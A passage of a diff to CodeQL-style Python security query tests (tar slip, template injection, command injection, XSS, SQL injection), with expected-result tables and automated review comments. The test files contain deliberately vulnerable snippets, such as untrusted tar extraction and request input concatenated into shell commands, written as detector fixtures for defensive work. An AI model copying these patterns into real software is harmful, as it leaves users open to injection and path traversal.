extraction depends on a $@. 
| tarslip.py:90:7:90:39 | ControlFlowNode for Attribute() | potentially untrusted source | -| tarslip.py:96:17:96:21 | ControlFlowNode for entry | tarslip.py:94:7:94:39 | ControlFlowNode for Attribute() | tarslip.py:96:17:96:21 | ControlFlowNode for entry | This file extraction depends on a $@. | tarslip.py:94:7:94:39 | ControlFlowNode for Attribute() | potentially untrusted source | -| tarslip.py:110:1:110:3 | ControlFlowNode for tar | tarslip.py:109:7:109:39 | ControlFlowNode for Attribute() | tarslip.py:110:1:110:3 | ControlFlowNode for tar | This file extraction depends on a $@. | tarslip.py:109:7:109:39 | ControlFlowNode for Attribute() | potentially untrusted source | -| tarslip.py:113:24:113:26 | ControlFlowNode for tar | tarslip.py:112:7:112:39 | ControlFlowNode for Attribute() | tarslip.py:113:24:113:26 | ControlFlowNode for tar | This file extraction depends on a $@. | tarslip.py:112:7:112:39 | ControlFlowNode for Attribute() | potentially untrusted source | diff --git a/python/ql/test/query-tests/Security/CWE-022-TarSlip/TarSlip.qlref b/python/ql/test/query-tests/Security/CWE-022-TarSlip/TarSlip.qlref index cfede0c92b21..c9b6b9f4f069 100644 --- a/python/ql/test/query-tests/Security/CWE-022-TarSlip/TarSlip.qlref +++ b/python/ql/test/query-tests/Security/CWE-022-TarSlip/TarSlip.qlref @@ -1 +1,2 @@ -Security/CWE-022/TarSlip.ql +query: Security/CWE-022/TarSlip.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-022-TarSlip/tarslip.py b/python/ql/test/query-tests/Security/CWE-022-TarSlip/tarslip.py index 2c06d01adfd5..616c93043f7a 100644 --- a/python/ql/test/query-tests/Security/CWE-022-TarSlip/tarslip.py +++ b/python/ql/test/query-tests/Security/CWE-022-TarSlip/tarslip.py 
@@ -11,13 +11,13 @@ for entry in tar: tar.extract(entry) -tar = tarfile.open(unsafe_filename_tar) -tar.extractall() +tar = tarfile.open(unsafe_filename_tar) # $ Source +tar.extractall() # $ Alert tar.close() -tar = tarfile.open(unsafe_filename_tar) +tar = tarfile.open(unsafe_filename_tar) # $ Source for entry in tar: - tar.extract(entry) + tar.extract(entry) # $ Alert tar = tarfile.open(safe_filename_tar) tar.extractall() @@ -32,15 +32,15 @@ tar.extract(entry, "/tmp/unpack/") #Part Sanitized -tar = tarfile.open(unsafe_filename_tar) +tar = tarfile.open(unsafe_filename_tar) # $ Source for entry in tar: if ".." in entry.name: raise ValueError("Illegal tar archive entry") - tar.extract(entry, "/tmp/unpack/") + tar.extract(entry, "/tmp/unpack/") # $ Alert #Unsanitized members -tar = tarfile.open(unsafe_filename_tar) -tar.extractall(members=tar) +tar = tarfile.open(unsafe_filename_tar) # $ Source +tar.extractall(members=tar) # $ Alert #Sanitize members @@ -55,10 +55,10 @@ def safemembers(members): # Wrong sanitizer (is missing not) -tar = tarfile.open(unsafe_filename_tar) +tar = tarfile.open(unsafe_filename_tar) # $ Source for entry in tar: if os.path.isabs(entry.name) or ".." in entry.name: - tar.extract(entry, "/tmp/unpack/") + tar.extract(entry, "/tmp/unpack/") # $ Alert # OK Sanitized using not @@ -87,13 +87,13 @@ def safemembers(members): extraction_filter = "fully_trusted" -tar = tarfile.open(unsafe_filename_tar) -tar.extractall(filter=extraction_filter) # unsafe +tar = tarfile.open(unsafe_filename_tar) # $ Source +tar.extractall(filter=extraction_filter) # unsafe # $ Alert tar.close() -tar = tarfile.open(unsafe_filename_tar) +tar = tarfile.open(unsafe_filename_tar) # $ Source for entry in tar: - tar.extract(entry, filter=extraction_filter) # unsafe + tar.extract(entry, filter=extraction_filter) # unsafe # $ Alert extraction_filter = "data" 
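Review bot: In the `#Part Sanitized` case (hunk `-32,15`), the new `# $ Alert` on `tar.extract(entry, "/tmp/unpack/")` pins a finding that the surrounding comment does not explain. The guard above it rejects only entry names containing `".."`, whereas the "Wrong sanitizer" case in hunk `-55,10` also tests `os.path.isabs(entry.name)`, so the alert is presumably expected because absolute entry names still reach the extraction call. I would reword the case header to something like `# Partially sanitized: ".." is rejected but absolute entry names are not, so this is still flagged`, so a reader does not take the alert for a false positive.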
@@ -106,11 +106,11 @@ def safemembers(members): tar.extract(entry, filter=extraction_filter) # safe extraction_filter = None -tar = tarfile.open(unsafe_filename_tar) -tar.extractall(filter=extraction_filter) # unsafe +tar = tarfile.open(unsafe_filename_tar) # $ Source +tar.extractall(filter=extraction_filter) # unsafe # $ Alert -tar = tarfile.open(unsafe_filename_tar) -tar.extractall(members=tar, filter=extraction_filter) # unsafe +tar = tarfile.open(unsafe_filename_tar) # $ Source +tar.extractall(members=tar, filter=extraction_filter) # unsafe # $ Alert tar = tarfile.open(unsafe_filename_tar) tar.extractall(members=safemembers(tar), filter=extraction_filter) # safe -- we assume `safemembers` makes up for the unsafe filter diff --git a/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/JinjaSsti.py b/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/JinjaSsti.py index f1fe834e4936..0dad4e31f645 100644 --- a/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/JinjaSsti.py +++ b/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/JinjaSsti.py @@ -4,21 +4,21 @@ from jinja2 import Environment, DictLoader, escape -def a(request): +def a(request): # $ Source # Load the template template = request.GET['template'] - t = Template(template) # BAD: Template constructed from user input + t = Template(template) # BAD: Template constructed from user input # $ Alert name = request.GET['name'] # Render the template with the context data html = t.render(name=escape(name)) return HttpResponse(html) -def b(request): +def b(request): # $ Source import jinja2 # Load the template template = request.GET['template'] env = Environment() - t = env.from_string(template) # BAD: Template constructed from user input + t = env.from_string(template) # BAD: Template constructed from user input # $ Alert name = request.GET['name'] # Render the template with the context data html = t.render(name=escape(name)) 
diff --git a/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected b/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected index f92107728395..a4bf57e174c1 100644 --- a/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected +++ b/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected @@ -1,3 +1,6 @@ +#select +| JinjaSsti.py:10:18:10:25 | ControlFlowNode for template | JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | JinjaSsti.py:10:18:10:25 | ControlFlowNode for template | This template construction depends on a $@. | JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | user-provided value | +| JinjaSsti.py:21:25:21:32 | ControlFlowNode for template | JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | JinjaSsti.py:21:25:21:32 | ControlFlowNode for template | This template construction depends on a $@. | JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | user-provided value | edges | JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | JinjaSsti.py:9:5:9:12 | ControlFlowNode for template | provenance | AdditionalTaintStep | | JinjaSsti.py:9:5:9:12 | ControlFlowNode for template | JinjaSsti.py:10:18:10:25 | ControlFlowNode for template | provenance | | 
@@ -11,6 +14,3 @@ nodes | JinjaSsti.py:19:5:19:12 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | | JinjaSsti.py:21:25:21:32 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | subpaths -#select -| JinjaSsti.py:10:18:10:25 | ControlFlowNode for template | JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | JinjaSsti.py:10:18:10:25 | ControlFlowNode for template | This template construction depends on a $@. | JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | user-provided value | -| JinjaSsti.py:21:25:21:32 | ControlFlowNode for template | JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | JinjaSsti.py:21:25:21:32 | ControlFlowNode for template | This template construction depends on a $@. | JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.qlref b/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.qlref index ead6bb469c6a..818407e3eb80 100644 --- a/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.qlref +++ b/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.qlref @@ -1 +1,2 @@ -Security/CWE-074/TemplateInjection.ql \ No newline at end of file +query: Security/CWE-074/TemplateInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-078-CommandInjection-py2/CommandInjection.expected b/python/ql/test/query-tests/Security/CWE-078-CommandInjection-py2/CommandInjection.expected index 563a0ac74aec..99941d47b288 100644 --- a/python/ql/test/query-tests/Security/CWE-078-CommandInjection-py2/CommandInjection.expected +++ b/python/ql/test/query-tests/Security/CWE-078-CommandInjection-py2/CommandInjection.expected 
@@ -1,3 +1,13 @@ +#select +| command_injection.py:19:15:19:27 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:19:15:19:27 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | +| command_injection.py:20:15:20:27 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:20:15:20:27 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | +| command_injection.py:21:15:21:27 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:21:15:21:27 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | +| command_injection.py:23:20:23:32 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:23:20:23:32 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | +| command_injection.py:25:19:25:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:25:19:25:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | +| command_injection.py:26:19:26:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:26:19:26:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. 
| command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | +| command_injection.py:27:19:27:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:27:19:27:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | +| command_injection.py:28:19:28:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:28:19:28:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | +| command_injection.py:29:19:29:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:29:19:29:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | edges | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:5:26:5:32 | ControlFlowNode for request | provenance | | | command_injection.py:5:26:5:32 | ControlFlowNode for request | command_injection.py:18:13:18:19 | ControlFlowNode for request | provenance | | 
@@ -30,13 +40,3 @@ nodes | command_injection.py:28:19:28:31 | ControlFlowNode for BinaryExpr | semmle.label | ControlFlowNode for BinaryExpr | | command_injection.py:29:19:29:31 | ControlFlowNode for BinaryExpr | semmle.label | ControlFlowNode for BinaryExpr | subpaths -#select -| command_injection.py:19:15:19:27 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:19:15:19:27 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | -| command_injection.py:20:15:20:27 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:20:15:20:27 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | -| command_injection.py:21:15:21:27 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:21:15:21:27 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | -| command_injection.py:23:20:23:32 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:23:20:23:32 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | -| command_injection.py:25:19:25:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:25:19:25:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. 
| command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | -| command_injection.py:26:19:26:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:26:19:26:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | -| command_injection.py:27:19:27:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:27:19:27:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | -| command_injection.py:28:19:28:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:28:19:28:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | -| command_injection.py:29:19:29:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:29:19:29:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-078-CommandInjection-py2/CommandInjection.qlref b/python/ql/test/query-tests/Security/CWE-078-CommandInjection-py2/CommandInjection.qlref index e38b88f29197..8d677af35712 100644 --- a/python/ql/test/query-tests/Security/CWE-078-CommandInjection-py2/CommandInjection.qlref +++ b/python/ql/test/query-tests/Security/CWE-078-CommandInjection-py2/CommandInjection.qlref @@ -1 +1,2 @@ -Security/CWE-078/CommandInjection.ql +query: Security/CWE-078/CommandInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/python/ql/test/query-tests/Security/CWE-078-CommandInjection-py2/command_injection.py b/python/ql/test/query-tests/Security/CWE-078-CommandInjection-py2/command_injection.py index 09dd2bf97168..676215f29d1b 100644 --- a/python/ql/test/query-tests/Security/CWE-078-CommandInjection-py2/command_injection.py +++ b/python/ql/test/query-tests/Security/CWE-078-CommandInjection-py2/command_injection.py @@ -2,7 +2,7 @@ import platform import popen2 -from flask import Flask, request +from flask import Flask, request # $ Source app = Flask(__name__) @@ -16,14 +16,14 @@ def python2_specific(): """ files = request.args.get("files", "") - os.popen2("ls " + files) - os.popen3("ls " + files) - os.popen4("ls " + files) + os.popen2("ls " + files) # $ Alert + os.popen3("ls " + files) # $ Alert + os.popen4("ls " + files) # $ Alert - platform.popen("ls " + files) + platform.popen("ls " + files) # $ Alert - popen2.popen2("ls " + files) - popen2.popen3("ls " + files) - popen2.popen4("ls " + files) - popen2.Popen3("ls " + files) - popen2.Popen4("ls " + files) + popen2.popen2("ls " + files) # $ Alert + popen2.popen3("ls " + files) # $ Alert + popen2.popen4("ls " + files) # $ Alert + popen2.Popen3("ls " + files) # $ Alert + popen2.Popen4("ls " + files) # $ Alert diff --git a/python/ql/test/query-tests/Security/CWE-078-CommandInjection/CommandInjection.qlref b/python/ql/test/query-tests/Security/CWE-078-CommandInjection/CommandInjection.qlref index e38b88f29197..47dd63a884ea 100644 --- a/python/ql/test/query-tests/Security/CWE-078-CommandInjection/CommandInjection.qlref +++ b/python/ql/test/query-tests/Security/CWE-078-CommandInjection/CommandInjection.qlref @@ -1 +1 @@ -Security/CWE-078/CommandInjection.ql +query: Security/CWE-078/CommandInjection.ql 
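Review bot: `CWE-078-CommandInjection/CommandInjection.qlref` is converted to the `query:` form without the `postprocess: utils/test/InlineExpectationsTestQuery.ql` line that the py2 sibling and the other converted tests in this patch receive. The same applies to `UnsafeShellCommandConstruction.qlref` in the next file. Without the postprocess step, any `# $ Alert` / `# $ Source` annotations in those test sources are not checked against the query results, so a regression in the command-injection query would only show up as an `.expected` diff. If this is deliberate (for example, the sources are annotated in a later patch of the series), a short note in the commit message would help; otherwise add the `postprocess:` line and annotate the test files here.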
diff --git a/python/ql/test/query-tests/Security/CWE-078-UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.qlref b/python/ql/test/query-tests/Security/CWE-078-UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.qlref index fdc01b9ecbf7..6d6ee0abf7d8 100644 --- a/python/ql/test/query-tests/Security/CWE-078-UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.qlref +++ b/python/ql/test/query-tests/Security/CWE-078-UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.qlref @@ -1 +1 @@ -Security/CWE-078/UnsafeShellCommandConstruction.ql +query: Security/CWE-078/UnsafeShellCommandConstruction.ql diff --git a/python/ql/test/query-tests/Security/CWE-079-Jinja2WithoutEscaping/Jinja2WithoutEscaping.qlref b/python/ql/test/query-tests/Security/CWE-079-Jinja2WithoutEscaping/Jinja2WithoutEscaping.qlref index 9fefcf4a030d..d63a6068dc22 100644 --- a/python/ql/test/query-tests/Security/CWE-079-Jinja2WithoutEscaping/Jinja2WithoutEscaping.qlref +++ b/python/ql/test/query-tests/Security/CWE-079-Jinja2WithoutEscaping/Jinja2WithoutEscaping.qlref @@ -1 +1,2 @@ -Security/CWE-079/Jinja2WithoutEscaping.ql +query: Security/CWE-079/Jinja2WithoutEscaping.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-079-Jinja2WithoutEscaping/jinja2_escaping.py b/python/ql/test/query-tests/Security/CWE-079-Jinja2WithoutEscaping/jinja2_escaping.py index aed840ce8863..4c63f5b5fd61 100644 --- a/python/ql/test/query-tests/Security/CWE-079-Jinja2WithoutEscaping/jinja2_escaping.py +++ b/python/ql/test/query-tests/Security/CWE-079-Jinja2WithoutEscaping/jinja2_escaping.py @@ -6,7 +6,7 @@ app = Flask(__name__) loader = FileSystemLoader( searchpath="templates/" ) -unsafe_env = Environment(loader=loader) +unsafe_env = Environment(loader=loader) # $ Alert safe1_env = Environment(loader=loader, autoescape=True) safe2_env = Environment(loader=loader, autoescape=select_autoescape()) 
@@ -38,18 +38,18 @@ def safe2(): auto = select_autoescape e = Environment(autoescape=auto) # GOOD z = 0 -e = Environment(autoescape=z) # BAD +e = Environment(autoescape=z) # BAD # $ Alert E = Environment -E() # BAD -E(autoescape=z) # BAD +E() # BAD # $ Alert +E(autoescape=z) # BAD # $ Alert E(autoescape=auto) # GOOD E(autoescape=0+1) # GOOD def checked(cond=False): if cond: - e = Environment(autoescape=cond) # GOOD + e = Environment(autoescape=cond) # GOOD # $ Alert -unsafe_tmpl = Template('Hello {{ name }}!') +unsafe_tmpl = Template('Hello {{ name }}!') # $ Alert safe1_tmpl = Template('Hello {{ name }}!', autoescape=True) safe2_tmpl = Template('Hello {{ name }}!', autoescape=select_autoescape()) diff --git a/python/ql/test/query-tests/Security/CWE-079-ReflectedXss/ReflectedXss.expected b/python/ql/test/query-tests/Security/CWE-079-ReflectedXss/ReflectedXss.expected index d332231e0c99..bf4f584c8157 100644 --- a/python/ql/test/query-tests/Security/CWE-079-ReflectedXss/ReflectedXss.expected +++ b/python/ql/test/query-tests/Security/CWE-079-ReflectedXss/ReflectedXss.expected 
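Review bot: In `checked()`, the line `e = Environment(autoescape=cond)  # GOOD # $ Alert` records a result the file's own comment calls safe, so the test now enforces a known false positive as if it were a true finding. The inline expectation syntax has a marker for this, and the line should read `e = Environment(autoescape=cond)  # GOOD # $ SPURIOUS: Alert`. The same pattern appears in `reflected_xss.py` hunk `-19,13`, where `safe_json` carries `# OK, FP # $ Alert`; that one should become `# OK, FP # $ SPURIOUS: Alert`. With a plain `Alert`, a future precision fix to the query would appear as a test failure rather than as an expected improvement.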
@@ -1,3 +1,7 @@ +#select +| reflected_xss.py:10:26:10:53 | ControlFlowNode for BinaryExpr | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | reflected_xss.py:10:26:10:53 | ControlFlowNode for BinaryExpr | Cross-site scripting vulnerability due to a $@. | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| reflected_xss.py:22:26:22:41 | ControlFlowNode for Attribute() | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | reflected_xss.py:22:26:22:41 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to a $@. | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| reflected_xss.py:28:26:28:41 | ControlFlowNode for Attribute() | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | reflected_xss.py:28:26:28:41 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to a $@. | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | edges | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | reflected_xss.py:2:26:2:32 | ControlFlowNode for request | provenance | | | reflected_xss.py:2:26:2:32 | ControlFlowNode for request | reflected_xss.py:9:18:9:24 | ControlFlowNode for request | provenance | | 
@@ -28,7 +32,3 @@ nodes | reflected_xss.py:27:23:27:29 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | | reflected_xss.py:28:26:28:41 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | subpaths -#select -| reflected_xss.py:10:26:10:53 | ControlFlowNode for BinaryExpr | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | reflected_xss.py:10:26:10:53 | ControlFlowNode for BinaryExpr | Cross-site scripting vulnerability due to a $@. | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| reflected_xss.py:22:26:22:41 | ControlFlowNode for Attribute() | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | reflected_xss.py:22:26:22:41 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to a $@. | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| reflected_xss.py:28:26:28:41 | ControlFlowNode for Attribute() | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | reflected_xss.py:28:26:28:41 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to a $@. | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-079-ReflectedXss/ReflectedXss.qlref b/python/ql/test/query-tests/Security/CWE-079-ReflectedXss/ReflectedXss.qlref index e0efe1024162..9cd0122e556e 100644 --- a/python/ql/test/query-tests/Security/CWE-079-ReflectedXss/ReflectedXss.qlref +++ b/python/ql/test/query-tests/Security/CWE-079-ReflectedXss/ReflectedXss.qlref @@ -1 +1,2 @@ -Security/CWE-079/ReflectedXss.ql +query: Security/CWE-079/ReflectedXss.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-079-ReflectedXss/reflected_xss.py b/python/ql/test/query-tests/Security/CWE-079-ReflectedXss/reflected_xss.py index 98682f04f3cb..8c78cc07ba1b 100644 
--- a/python/ql/test/query-tests/Security/CWE-079-ReflectedXss/reflected_xss.py +++ b/python/ql/test/query-tests/Security/CWE-079-ReflectedXss/reflected_xss.py @@ -1,5 +1,5 @@ import json -from flask import Flask, request, make_response, escape, jsonify +from flask import Flask, request, make_response, escape, jsonify # $ Source app = Flask(__name__) @@ -7,7 +7,7 @@ @app.route("/unsafe") def unsafe(): first_name = request.args.get("name", "") - return make_response("Your name is " + first_name) # NOT OK + return make_response("Your name is " + first_name) # NOT OK # $ Alert @app.route("/safe") @@ -19,13 +19,13 @@ def safe(): @app.route("/unsafe/json") def unsafe_json(): data = json.loads(request.data) - return make_response(json.dumps(data)) # NOT OK + return make_response(json.dumps(data)) # NOT OK # $ Alert @app.route("/safe/json") def safe_json(): data = json.loads(request.data) - return make_response(json.dumps(data), 200, {'Content-Type': 'application/json'}) # OK, FP + return make_response(json.dumps(data), 200, {'Content-Type': 'application/json'}) # OK, FP # $ Alert @app.route("/jsonify") diff --git a/python/ql/test/query-tests/Security/CWE-089-SqlInjection/SqlInjection.expected b/python/ql/test/query-tests/Security/CWE-089-SqlInjection/SqlInjection.expected index 9ff8b1d718c1..c1958c23858d 100644 --- a/python/ql/test/query-tests/Security/CWE-089-SqlInjection/SqlInjection.expected +++ b/python/ql/test/query-tests/Security/CWE-089-SqlInjection/SqlInjection.expected 
@@ -1,3 +1,20 @@ +#select +| sql_injection.py:21:24:21:77 | ControlFlowNode for BinaryExpr | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:21:24:21:77 | ControlFlowNode for BinaryExpr | This SQL query depends on a $@. | sql_injection.py:14:15:14:22 | ControlFlowNode for username | user-provided value | +| sql_injection.py:24:38:24:95 | ControlFlowNode for BinaryExpr | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:24:38:24:95 | ControlFlowNode for BinaryExpr | This SQL query depends on a $@. | sql_injection.py:14:15:14:22 | ControlFlowNode for username | user-provided value | +| sql_injection.py:25:26:25:83 | ControlFlowNode for BinaryExpr | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:25:26:25:83 | ControlFlowNode for BinaryExpr | This SQL query depends on a $@. | sql_injection.py:14:15:14:22 | ControlFlowNode for username | user-provided value | +| sql_injection.py:26:28:26:85 | ControlFlowNode for BinaryExpr | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:26:28:26:85 | ControlFlowNode for BinaryExpr | This SQL query depends on a $@. | sql_injection.py:14:15:14:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:27:28:27:87 | ControlFlowNode for Attribute() | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:27:28:27:87 | ControlFlowNode for Attribute() | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:31:50:31:72 | ControlFlowNode for Attribute() | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:31:50:31:72 | ControlFlowNode for Attribute() | This SQL query depends on a $@. 
| sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:41:26:41:33 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:41:26:41:33 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:42:31:42:38 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:42:31:42:38 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:43:30:43:37 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:43:30:43:37 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:44:35:44:42 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:44:35:44:42 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:45:41:45:48 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:45:41:45:48 | ControlFlowNode for username | This SQL query depends on a $@. 
